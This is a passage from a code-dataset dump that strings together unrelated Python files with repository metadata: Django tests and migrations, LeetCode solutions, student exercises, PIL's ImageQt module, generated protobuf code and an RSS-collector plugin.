self.assertTrue(eventpoller.parse_message(raw_incident))
incident = Incident.objects.filter()[0]
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# 2nd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T+10)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#3rd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 11)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# 4th incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 51)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#We should have one incident and 4 incident logs
self.assertEqual(Incident.objects.count(), 1)
self.assertEqual(IncidentLog.objects.count(), 4)
# Assert we only execute plugin once
self.assertEqual(mock_requests.post.call_count, 1)
# 5th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 101)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# Assert we did not execute plugin yet
self.assertEqual(mock_requests.post.call_count, 1)
# 6th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 121)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# Assert event action occurred for the second time
self.assertEqual(mock_requests.post.call_count, 2)
#todo create tests to check use cases mentioned in the comments
|
[
"[email protected]"
] | |
20691830fbf91a5caae39677d6ec0024590b522a
|
72b00923d4aa11891f4a3038324c8952572cc4b2
|
/python/datastruct/dd_oob/pgm07_28.txt
|
c1f7f8084c1a8e16b2bdb107bdc35ca04776988a
|
[] |
no_license
|
taowuwen/codec
|
3698110a09a770407e8fb631e21d86ba5a885cd5
|
d92933b07f21dae950160a91bb361fa187e26cd2
|
refs/heads/master
| 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 |
C
|
UTF-8
|
Python
| false | false | 722 |
txt
|
#
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
def withdraw(self, obj):
if self._count == 0:
raise ContainerEmpty
offset = self.findOffset(obj)
if offset < 0:
raise KeyError
i = offset
while i < self._count:
self._array[i] = self._array[i + 1]
i += 1
self._array[i] = None
self._count -= 1
# ...
|
[
"[email protected]"
] | |
2a0f864a90d2c9af31adaade203406309f66c9d1
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_333/ch77_2020_04_13_15_29_15_904054.py
|
a10778292bfbe71d82aaf9be4a6d5a915023fc82
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 348 |
py
|
import math
def calcula_tempo(dicionario):
nome_tempo={}
for nome_e_aceleracao in dicionario:
nome=nome_e_aceleracao[0]
aceleracao=nome_e_aceleracao[1]
tempo=aceleracao_tempo(int(aceleracao))
nome_tempo[nome]=tempo
return nome_tempo
def aceleracao_tempo(a):
t=math.sqrt(200/a)
return t
|
[
"[email protected]"
] | |
8ea08f6a84070e59475e3de8786df6296cbdddd9
|
a989ff888d86eaad7d3572993d89af17bb29c7ec
|
/kartverket_stormsurge/helper/datetimes.py
|
981e44efed210c6a738f00d83a0f60092b15ec65
|
[
"MIT"
] |
permissive
|
jerabaul29/kartverket_storm_surge_data
|
8f873232a3aff92f07a73220e51f8385278a029a
|
9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49
|
refs/heads/master
| 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,229 |
py
|
import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
"""Assert that date_in is an UTC datetime."""
ras(isinstance(date_in, datetime.datetime))
if not (date_in.tzinfo == pytz.utc or
date_in.tzinfo == datetime.timezone.utc):
raise Exception("not utc!")
if date_in.tzinfo == pytz.utc:
print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
"""Assert that date_in is a datetime that is a
multiple of 10 minutes.
"""
ras(isinstance(date_in, datetime.datetime))
ras(date_in.second == 0)
ras((date_in.minute % 10) == 0)
ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
"""Yield a datetime range, in the range [datetime_start; datetime_end[,
with step step_timedelta."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_time = datetime_start
yield crrt_time
while True:
crrt_time += step_timedelta
if crrt_time < datetime_end:
yield crrt_time
else:
break
def datetime_segments(datetime_start, datetime_end, step_timedelta):
"""Generate a succession of segments, that cover [datetime_start; datetime_end].
The segments will have length step_timedelta, except possibly the last segment
that may be shorter."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_segment_start = datetime_start
crrt_segment_end = crrt_segment_start + step_timedelta
while True:
if crrt_segment_end >= datetime_end:
yield (crrt_segment_start, datetime_end)
break
else:
yield (crrt_segment_start, crrt_segment_end)
crrt_segment_start += step_timedelta
crrt_segment_end += step_timedelta
|
[
"[email protected]"
] | |
3f1602c001f4b70e038794a08ba4c725871c4198
|
040bd1995190e858299fcdd716bd986aa0664d13
|
/Trees and Graphs/MaxiumumDepthOfBinaryTree.py
|
04b51d71defc1958be86b73fc93dbac3a0196e5e
|
[] |
no_license
|
PravinSelva5/LeetCode_Grind
|
7c568d68231ff34332d756237e79ca8d19cebfec
|
aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a
|
refs/heads/master
| 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,066 |
py
|
'''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
if root.left == None and root.right == None:
return 1
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
return max(left, right) + 1
|
[
"[email protected]"
] | |
633981c5580abc6b32852ac0098516780d0c8861
|
d9563f113fa4dcbf6dadb5ea186d69839f372119
|
/pedidos/migrations/0004_auto_20191129_1821.py
|
08c3d750eba80e0bc31f5b96aa8c4b9131fc203e
|
[] |
no_license
|
CarlosSanz81/serv
|
717eefea1ead9325472cef165f2326a14dd355cd
|
dd3cb5b022b8b939ff6ea502b8335c257d057abb
|
refs/heads/master
| 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
# Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pedidos', '0003_archivo'),
]
operations = [
migrations.AlterField(
model_name='archivo',
name='nombre',
field=models.FileField(blank=True, null=True, upload_to='./media/'),
),
]
|
[
"[email protected]"
] | |
c92c8e96486ba05e3cf7c3d52836a06125a9a899
|
3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1
|
/nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py
|
168864c2174450afb47cb0f7ac89fb6b1324b927
|
[] |
no_license
|
stefie10/slu_hri
|
a76f79094bd1740676fec5d889411ba3b1d9dc26
|
50753379953e1ff822162eeab094cffe4a30f3e1
|
refs/heads/master
| 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,742 |
py
|
"""
<name>Preprocessing</name>
<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
contextHandlers = {"": PerfectDomainContextHandler()}
def __init__(self,parent=None, signalManager = None):
OWWidget.__init__(self, parent, signalManager, "Preprocessing")
self.inputs = [("Examples", ExampleTable, self.setData)]
self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
self.loadSettings()
self.apply()
self.adjustSize()
def setData(self, data):
self.data = data
self.sendData()
def sendData(self):
if not self.data or not self.preprocessor:
self.preprocessed = self.data
else:
self.preprocessed = self.preprocessor.processData(self.data)
self.send("Examples", self.preprocessed)
def apply(self):
# The widget needs to construct a new instance of Preprocessor
# If it modified and send the same instance every time, it would
# modify an instance which has been passed to another widget which
# might have a disabled connection and should not get any modifications
# (and would even not get notified about the preprocessor having been changed)
self.preprocessor = Preprocessor()
self.send("Preprocessor", self.preprocessor)
|
[
"[email protected]"
] | |
bd63b8e1ecf45c334724bc34debf628114b3047e
|
f734a39a0c37186e90caea597f13000823c9e67a
|
/leetcode/Hash Table/1213. Intersection of Three Sorted Arrays.py
|
658d6de9e6d97a5ad69bbe7071633e6fde37a8e0
|
[
"MIT"
] |
permissive
|
yanshengjia/algorithm
|
681746e0371a82860e64a279bfe4c83545469641
|
46caaf74aeab8af74861fb5b249eb4169baf8493
|
refs/heads/master
| 2022-08-02T20:15:57.927418 | 2022-07-17T14:43:51 | 2022-07-17T14:43:51 | 192,160,418 | 69 | 32 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,006 |
py
|
"""
Given three integer arrays arr1, arr2 and arr3 sorted in strictly increasing order, return a sorted array of only the integers that appeared in all three arrays.
Example 1:
Input: arr1 = [1,2,3,4,5], arr2 = [1,2,5,7,9], arr3 = [1,3,4,5,8]
Output: [1,5]
Explanation: Only 1 and 5 appeared in the three arrays.
Solution:
Use Hashtable to record the frequency of numbers, a number in intersection should have the frequency of 3
"""
# Time: O(m+n+q), m n q is the length of 3 arrays
# Space: O(x), x it the size of intersection
class Solution:
def arraysIntersection(self, arr1: List[int], arr2: List[int], arr3: List[int]) -> List[int]:
d = dict()
for c in arr1:
d[c] = d.get(c, 0) + 1
for c in arr2:
d[c] = d.get(c, 0) + 1
for c in arr3:
d[c] = d.get(c, 0) + 1
res = []
for k, v in d.items():
if v == 3:
res.append(k)
res.sort()
return res
|
[
"[email protected]"
] | |
7c2d99114b3aafbeb624eb534da25400a8ae4e87
|
06c1d6bcd099bf1c25abb52ba07351b068d1ab16
|
/Unidad_3/leccion_3.py
|
7c26b82dce0e0e918ab604fafd4e3dc5a427c8aa
|
[] |
no_license
|
dafnemus/python-curso-udemy
|
1105e5f51980d6f5ec32dac338ebc340250c6384
|
493717fb321b24bd5abcadb8e27d25d68b4f12f8
|
refs/heads/main
| 2023-03-09T12:27:41.934087 | 2021-02-24T18:34:56 | 2021-02-24T18:34:56 | 337,728,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,638 |
py
|
# pylint: disable=missing-docstring
# 1. Aplica un incremento de sueldo del 8% al salario de un trabajador.
# Para ello, recuerda que primero debes solicitar el monto base del salario.
def incrementar_sueldo(sueldo):
incremento = 0.08
valor_incrementado = sueldo * incremento
sueldo_incrementado = sueldo + valor_incrementado
print(f'Total sueldo:{sueldo_incrementado}', end=' ')
print(f'incremento: {valor_incrementado}')
incrementar_sueldo(2000)
print()
# 2. Aplica un incremento de sueldo del 8% al salario de un trabajador,
# solo si este gana menos que el salario mínimo
# (escoge cualquier valor para el salario mínimo, porejemplo 1000).
# Si el trabajador gana más que el salario mínimo, el incremento es del 5%
def incrementar_sueldo_2(sueldo):
sueldo_minimo = 1000
incremento_1 = 0.08
incremento_2 = 0.05
sueldo_incrementado = 0
valor_incrementado = 0
if sueldo <= sueldo_minimo:
valor_incrementado = sueldo * incremento_1
elif sueldo > sueldo_minimo:
valor_incrementado = sueldo * incremento_2
sueldo_incrementado = sueldo + valor_incrementado
print(f'Total sueldo:{sueldo_incrementado}', end=' ')
print(f'incremento: {valor_incrementado}')
incrementar_sueldo_2(800)
incrementar_sueldo_2(2000)
print()
# 3. Dado un valor que representa una cantidad en segundos,
# indica su equivalente en minutos, horas y días.
def convertir_segundos(segundos):
un_minuto = 60
hora = 3600
dias = 86400
resultado_min = segundos / un_minuto
resultado_hr = segundos / hora
resultado_dia = segundos / dias
print(f'segundos {segundos}')
print(f'segundos a hora: {resultado_hr}')
print(f'segundos a minutos: {resultado_min}')
print(f'segundosa dias: {resultado_dia}')
convertir_segundos(87600)
print()
# 4. Determinar el mínimo de 3 valores solicitados. Ahora, con 4 valores.
lista_valores = []
def agregar_valor(valor):
lista_valores.append(valor)
def minimo():
print(f'valores: {lista_valores}')
if len(lista_valores) <= 4:
print(f'valor minimo: {min(lista_valores)}')
agregar_valor(2)
agregar_valor(8)
agregar_valor(3)
minimo()
print()
# 5. Solicita al usuario, un número mayor que cero y menor a un millón,
# determina si el número de dígitos de dicho valor.
# Así, si el valor ingresado es 3, entonces el resultado será 1.
# Del mismo modo, si el valor ingresado es 768590, el resultado será 6
def contar_digitos(numero):
if 0 < numero < 1000000:
digitos = len(str(numero))
print(f'el numero {numero} tiene {digitos} digitos')
contar_digitos(22)
|
[
"[email protected]"
] | |
19c1083ddebaae8a8cafbbfcbc4f663167f858b0
|
79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7
|
/kikimr/public/api/grpc/ydb_export_v1_pb2.py
|
8b1ed589a3769c3321e6a8c3913604b83594a9b6
|
[
"Apache-2.0"
] |
permissive
|
clumpytuna/ydb-python-sdk
|
8dd951a532045587fcba1d541b3fb8798c358318
|
f09d8db19f62032738ed77dabb3672c3e0f86cc3
|
refs/heads/master
| 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 |
NOASSERTION
| 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null |
UTF-8
|
Python
| false | true | 2,581 |
py
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/grpc/ydb_export_v1.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from kikimr.public.api.protos import ydb_export_pb2 as kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='kikimr/public/api/grpc/ydb_export_v1.proto',
package='Ydb.Export.V1',
syntax='proto3',
serialized_pb=_b('\n*kikimr/public/api/grpc/ydb_export_v1.proto\x12\rYdb.Export.V1\x1a)kikimr/public/api/protos/ydb_export.proto2\xa9\x01\n\rExportService\x12K\n\nExportToYt\x12\x1d.Ydb.Export.ExportToYtRequest\x1a\x1e.Ydb.Export.ExportToYtResponse\x12K\n\nExportToS3\x12\x1d.Ydb.Export.ExportToS3Request\x1a\x1e.Ydb.Export.ExportToS3ResponseB\x1a\n\x18\x63om.yandex.ydb.export.v1b\x06proto3')
,
dependencies=[kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.export.v1'))
_EXPORTSERVICE = _descriptor.ServiceDescriptor(
name='ExportService',
full_name='Ydb.Export.V1.ExportService',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=105,
serialized_end=274,
methods=[
_descriptor.MethodDescriptor(
name='ExportToYt',
full_name='Ydb.Export.V1.ExportService.ExportToYt',
index=0,
containing_service=None,
input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTREQUEST,
output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTRESPONSE,
options=None,
),
_descriptor.MethodDescriptor(
name='ExportToS3',
full_name='Ydb.Export.V1.ExportService.ExportToS3',
index=1,
containing_service=None,
input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3REQUEST,
output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3RESPONSE,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_EXPORTSERVICE)
DESCRIPTOR.services_by_name['ExportService'] = _EXPORTSERVICE
# @@protoc_insertion_point(module_scope)
|
[
"[email protected]"
] | |
6733aab9ea53e9cbe7a36f8c18521ad328708815
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/pytorch/source/PIL/ImageQt.py
|
b747781c50bd2eede24eb9145a6224a4a90712ff
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 |
MIT
| 2022-11-26T05:02:14 | 2016-10-19T18:22:39 |
Python
|
UTF-8
|
Python
| false | false | 6,558 |
py
|
#
# The Python Imaging Library.
# $Id$
#
# a simple Qt image interface.
#
# history:
# 2006-06-03 fl: created
# 2006-06-04 fl: inherit from QImage instead of wrapping it
# 2006-06-05 fl: removed toimage helper; move string support to ImageQt
# 2013-11-13 fl: add support for Qt5 ([email protected])
#
# Copyright (c) 2006 by Secret Labs AB
# Copyright (c) 2006 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isPath, py3
from io import BytesIO
import sys
qt_versions = [
['5', 'PyQt5'],
['side2', 'PySide2'],
['4', 'PyQt4'],
['side', 'PySide']
]
# If a version has already been imported, attempt it first
qt_versions.sort(key=lambda qt_version: qt_version[1] in sys.modules,
reverse=True)
for qt_version, qt_module in qt_versions:
try:
if qt_module == 'PyQt5':
from PyQt5.QtGui import QImage, qRgba, QPixmap
from PyQt5.QtCore import QBuffer, QIODevice
elif qt_module == 'PySide2':
from PySide2.QtGui import QImage, qRgba, QPixmap
from PySide2.QtCore import QBuffer, QIODevice
elif qt_module == 'PyQt4':
from PyQt4.QtGui import QImage, qRgba, QPixmap
from PyQt4.QtCore import QBuffer, QIODevice
elif qt_module == 'PySide':
from PySide.QtGui import QImage, qRgba, QPixmap
from PySide.QtCore import QBuffer, QIODevice
except (ImportError, RuntimeError):
continue
qt_is_installed = True
break
else:
qt_is_installed = False
qt_version = None
def rgb(r, g, b, a=255):
"""(Internal) Turns an RGB color into a Qt compatible color integer."""
# use qRgb to pack the colors, and then turn the resulting long
# into a negative integer with the same bitpattern.
return (qRgba(r, g, b, a) & 0xffffffff)
def fromqimage(im):
"""
:param im: A PIL Image object, or a file name
(given either as Python string or a PyQt string object)
"""
buffer = QBuffer()
buffer.open(QIODevice.ReadWrite)
# preserve alha channel with png
# otherwise ppm is more friendly with Image.open
if im.hasAlphaChannel():
im.save(buffer, 'png')
else:
im.save(buffer, 'ppm')
b = BytesIO()
try:
b.write(buffer.data())
except TypeError:
# workaround for Python 2
b.write(str(buffer.data()))
buffer.close()
b.seek(0)
return Image.open(b)
def fromqpixmap(im):
return fromqimage(im)
# buffer = QBuffer()
# buffer.open(QIODevice.ReadWrite)
# # im.save(buffer)
# # What if png doesn't support some image features like animation?
# im.save(buffer, 'ppm')
# bytes_io = BytesIO()
# bytes_io.write(buffer.data())
# buffer.close()
# bytes_io.seek(0)
# return Image.open(bytes_io)
def align8to32(bytes, width, mode):
"""
converts each scanline of data from 8 bit to 32 bit aligned
"""
bits_per_pixel = {
'1': 1,
'L': 8,
'P': 8,
}[mode]
# calculate bytes per line and the extra padding if needed
bits_per_line = bits_per_pixel * width
full_bytes_per_line, remaining_bits_per_line = divmod(bits_per_line, 8)
bytes_per_line = full_bytes_per_line + (1 if remaining_bits_per_line else 0)
extra_padding = -bytes_per_line % 4
# already 32 bit aligned by luck
if not extra_padding:
return bytes
new_data = []
for i in range(len(bytes) // bytes_per_line):
new_data.append(bytes[i*bytes_per_line:(i+1)*bytes_per_line]
+ b'\x00' * extra_padding)
return b''.join(new_data)
def _toqclass_helper(im):
data = None
colortable = None
# handle filename, if given instead of image name
if hasattr(im, "toUtf8"):
# FIXME - is this really the best way to do this?
if py3:
im = str(im.toUtf8(), "utf-8")
else:
im = unicode(im.toUtf8(), "utf-8") # noqa: F821
if isPath(im):
im = Image.open(im)
if im.mode == "1":
format = QImage.Format_Mono
elif im.mode == "L":
format = QImage.Format_Indexed8
colortable = []
for i in range(256):
colortable.append(rgb(i, i, i))
elif im.mode == "P":
format = QImage.Format_Indexed8
colortable = []
palette = im.getpalette()
for i in range(0, len(palette), 3):
colortable.append(rgb(*palette[i:i+3]))
elif im.mode == "RGB":
data = im.tobytes("raw", "BGRX")
format = QImage.Format_RGB32
elif im.mode == "RGBA":
try:
data = im.tobytes("raw", "BGRA")
except SystemError:
# workaround for earlier versions
r, g, b, a = im.split()
im = Image.merge("RGBA", (b, g, r, a))
format = QImage.Format_ARGB32
else:
raise ValueError("unsupported image mode %r" % im.mode)
__data = data or align8to32(im.tobytes(), im.size[0], im.mode)
return {
'data': __data, 'im': im, 'format': format, 'colortable': colortable
}
if qt_is_installed:
class ImageQt(QImage):
def __init__(self, im):
"""
An PIL image wrapper for Qt. This is a subclass of PyQt's QImage
class.
:param im: A PIL Image object, or a file name (given either as
Python string or a PyQt string object).
"""
im_data = _toqclass_helper(im)
# must keep a reference, or Qt will crash!
# All QImage constructors that take data operate on an existing
# buffer, so this buffer has to hang on for the life of the image.
# Fixes https://github.com/python-pillow/Pillow/issues/1370
self.__data = im_data['data']
QImage.__init__(self,
self.__data, im_data['im'].size[0],
im_data['im'].size[1], im_data['format'])
if im_data['colortable']:
self.setColorTable(im_data['colortable'])
def toqimage(im):
return ImageQt(im)
def toqpixmap(im):
# # This doesn't work. For now using a dumb approach.
# im_data = _toqclass_helper(im)
# result = QPixmap(im_data['im'].size[0], im_data['im'].size[1])
# result.loadFromData(im_data['data'])
# Fix some strange bug that causes
if im.mode == 'RGB':
im = im.convert('RGBA')
qimage = toqimage(im)
return QPixmap.fromImage(qimage)
|
[
"[email protected]"
] | |
d41da186fe71beeba5d6a5db47eb2df882f9a820
|
44221bc0507955c1e62d256182291ac95514c4f6
|
/automatron_notify/__init__.py
|
e4ef215bc2aaa375436f09977691bf480f1315f1
|
[
"MIT"
] |
permissive
|
automatron/automatron-notify
|
8c14ee5d8025ebefc7e9b7788e5414230c269676
|
4dcacfb3a56a51a7d1a7521f2ab9f7a895493f1a
|
refs/heads/master
| 2021-01-17T14:31:31.323071 | 2014-03-25T08:18:46 | 2014-03-25T08:18:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
py
|
from automatron.core.event import IAutomatronEventHandler
class IAutomatronNotifyHandler(IAutomatronEventHandler):
def on_notify(server, username, title, body, body_as_html=None):
"""
Called when a notification is triggered.
"""
|
[
"[email protected]"
] | |
321adce537d7842bc56ed5889f848d7433663330
|
4b8d6d0c057049beabdc7a516bd0653af94894a6
|
/DRF_nextjs/asgi.py
|
c3274d19c1591f6d6331af69cbe01c1a6e03c5b4
|
[] |
no_license
|
felipefoc/DRF-Next.Js
|
71a4d35cd2f69ffe84fb76b37a7094cc2950a71f
|
f8a904ec17d21e88590719ba98202d9fbcccf11e
|
refs/heads/main
| 2023-03-14T18:51:55.521287 | 2021-03-22T04:15:32 | 2021-03-22T04:15:32 | 350,203,864 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
ASGI config for DRF_nextjs project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DRF_nextjs.settings')
application = get_asgi_application()
|
[
"[email protected]"
] | |
141c85f367df5664a2789b37bc7d83c97dc4a197
|
b5a29700c3516cf12f837e2284e3844546205d09
|
/plugins/vipread_generic_plugin.py
|
2771bd40386bf812df6f131de4bd2ab09fe0bf1a
|
[] |
no_license
|
p1g3/Collect-Info-Research
|
f609823486f36460186cfde27f4be7c9c5a058ae
|
e8e7366677a8642c3bcf4b103e43378762e6673c
|
refs/heads/master
| 2020-12-24T03:59:01.190032 | 2020-01-31T06:47:35 | 2020-01-31T06:47:35 | 237,374,792 | 37 | 12 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,913 |
py
|
import asyncio
import feedparser
import ssl
import pymongo
from loguru import logger
import datetime
from dateutil import parser
class vipread_generic_plugin:
def __init__(self,loop,collection,lock):
ssl._create_default_https_context = ssl._create_unverified_context
self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
self.loop = loop
self.rss = 'http://vipread.com/feed'
self.collection = collection
self.type = 'generic'
self.lock = lock
async def return_result(self):
logger.info("{} is running.",self.__class__.__name__)
future = self.loop.run_in_executor(None,feedparser.parse,self.rss)
try:
parse_result = await asyncio.wait_for(future, 10, loop=self.loop)
except:
logger.warning("{} parse time out".format(self.rss))
return
if parse_result.has_key('entries'):
entries = parse_result['entries']
format_time = datetime.date.today()
for entrie in entries:
article_time = parser.parse(entrie['updated'])
if (article_time.year == format_time.year) and (article_time.month == format_time.month) and (article_time.day == format_time.day):
add_dict = {'type':self.type,'title':entrie['title'],'link':entrie['link'],'is_send':0}
try:
await self.lock
if self.collection.count_documents({'link':entrie['link']}) < 1:
self.collection.insert_one(add_dict)
logger.info('[Generic] {} {}'.format(entrie['title'],entrie['link']))
finally:
self.lock.release()
else:
logger.error('[Error Parse] {}',self.rss)
if __name__ == '__main__':
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.info_collect
collection = db['infos']
lock = asyncio.Lock()
loop = asyncio.get_event_loop()
class_name = vipread_generic_plugin(loop,collection,lock)
loop.run_until_complete(class_name.return_result())
|
[
"[email protected]"
] | |
68c3277a9fe9cd3efe646288a0c0b687daeb5f40
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_continua.py
|
1d4f1175f6f6eee08a5947b834b37af45e65325d
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 230 |
py
|
#calss header
class _CONTINUA():
def __init__(self,):
self.name = "CONTINUA"
self.definitions = continuum
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['continuum']
|
[
"[email protected]"
] | |
26fc8b49fcc85ffb16820963727e86ecec723ae3
|
abccdbf9b0849b47960c3c352870793405debfed
|
/0x02-python-import_modules/3-infinite_add.py
|
319d74896baaa8ff2b1e4ae09a0a2729223fdf4b
|
[] |
no_license
|
hunterxx0/holbertonschool-higher_level_programming
|
88b1b0f31b536c6940f2e64a6924a06ba9cbf193
|
44064cf0722cd20d93f58b64ab185d2898770d73
|
refs/heads/master
| 2022-12-20T12:14:15.877147 | 2020-09-24T21:25:54 | 2020-09-24T21:25:54 | 259,276,369 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
py
|
#!/usr/bin/python3
if __name__ == "__main__":
from sys import argv
x = len(argv)
if x == 2:
print("{}".format(argv[1]))
elif x == 1:
